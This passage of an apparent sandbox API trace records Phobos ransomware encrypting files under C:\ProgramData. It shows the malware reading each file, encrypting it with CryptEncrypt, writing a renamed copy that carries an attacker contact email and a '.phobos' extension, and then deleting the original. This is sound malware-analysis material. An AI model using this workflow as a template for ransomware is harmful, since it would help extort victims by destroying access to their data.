pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0165.169] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0165.170] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0165.170] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.170] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.170] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.170] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.170] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.170] CloseHandle (hObject=0x14c) returned 1 [0165.170] CloseHandle (hObject=0x190) returned 1 [0165.170] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata")) returned 1 [0165.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.203] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=12066) returned 1 [0165.203] CloseHandle (hObject=0x190) returned 1 [0165.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d")) returned 0x2026 [0165.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.203] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.204] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.204] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.204] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0165.206] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.206] ReadFile (in: hFile=0x190, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2f22, lpOverlapped=0x0) returned 1 [0165.207] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2f30, dwBufLen=0x2f30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2f30) returned 1 [0165.207] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2f30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2f30, lpOverlapped=0x0) returned 1 [0165.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0165.208] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.208] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.208] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.208] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.208] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.208] CloseHandle (hObject=0x190) returned 1 [0165.208] CloseHandle (hObject=0x14c) returned 1 [0165.209] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d")) returned 1 [0165.210] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.210] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=222716) returned 1 [0165.210] CloseHandle (hObject=0x14c) returned 1 [0165.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w")) returned 0x2026 [0165.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0165.211] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.212] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x365fc, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x36600, dwBufLen=0x36600 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x36600) returned 1 [0165.397] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x36600, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x36600, lpOverlapped=0x0) returned 1 [0165.539] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0165.539] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.539] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.539] CryptDestroyKey (hKey=0xa32968) returned 1 [0165.539] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.539] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.539] CloseHandle (hObject=0x14c) returned 1 [0165.539] CloseHandle (hObject=0x190) returned 1 [0165.561] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w")) returned 1 [0165.563] SetEvent (hEvent=0xe8) returned 1 [0165.563] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.564] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=499482) returned 1 [0165.564] CloseHandle (hObject=0x17c) returned 1 [0165.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h")) returned 0x2026 [0165.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.564] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.564] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.565] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.565] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.565] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x79f1a, lpOverlapped=0x0) returned 1 [0165.640] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x79f20, dwBufLen=0x79f20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x79f20) returned 1 [0165.644] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x79f20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x79f20, lpOverlapped=0x0) returned 1 [0165.661] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0165.661] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.662] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.662] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.662] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.662] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.662] CloseHandle (hObject=0x17c) returned 1 [0165.662] CloseHandle (hObject=0x130) returned 1 [0165.662] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h")) returned 1 [0165.666] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.666] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.667] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4) returned 1 [0165.667] CloseHandle (hObject=0x130) returned 1 [0165.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck")) returned 0x2026 [0165.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.667] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.667] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.667] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.667] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.667] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.667] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.667] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4, lpOverlapped=0x0) returned 1 [0165.668] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10, dwBufLen=0x10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10) returned 1 [0165.668] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10, lpOverlapped=0x0) returned 1 [0165.669] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0165.669] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.669] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.669] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.669] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.669] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.669] CloseHandle (hObject=0x130) returned 1 [0165.669] CloseHandle (hObject=0x17c) returned 1 [0165.669] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck")) returned 1 [0165.672] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.672] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.672] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=873232) returned 1 [0165.672] CloseHandle (hObject=0x17c) returned 1 [0165.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q")) returned 0x2026 [0165.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.673] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.673] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.673] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.673] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.673] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.673] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xd5310, lpOverlapped=0x0) returned 1 [0165.692] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd5320, dwBufLen=0xd5320 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd5320) returned 1 [0165.701] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd5320, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xd5320, lpOverlapped=0x0) returned 1 [0165.714] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0165.714] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.714] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0165.714] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.714] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x132, lpOverlapped=0x0) returned 1 [0165.714] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.714] CloseHandle (hObject=0x17c) returned 1 [0165.714] CloseHandle (hObject=0x130) returned 1 [0165.714] DeleteFileW 